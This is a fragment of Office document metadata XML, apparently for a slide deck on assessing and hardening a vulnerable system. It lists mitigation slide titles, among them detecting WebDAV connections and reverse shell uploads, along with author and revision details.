      <vt:lpstr>Mitigation: Finding the Request for the Hidden Directory</vt:lpstr>
      <vt:lpstr>Mitigation: Preventing Brute Force Attacks</vt:lpstr>
      <vt:lpstr>Mitigation: Detecting the WebDAV Connection</vt:lpstr>
      <vt:lpstr>Mitigation: Identifying Reverse Shell Uploads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Engagement Assessment, Analysis,  and Hardening of a Vulnerable System</dc:title>
  <cp:lastModifiedBy>Leon Scott</cp:lastModifiedBy>
  <cp:revision>28</cp:revision>
  <cp:lastPrinted>2022-07-24T03:33:49Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-26T13:32:41Z</dcterms:modified>
</cp:coreProperties>
</file>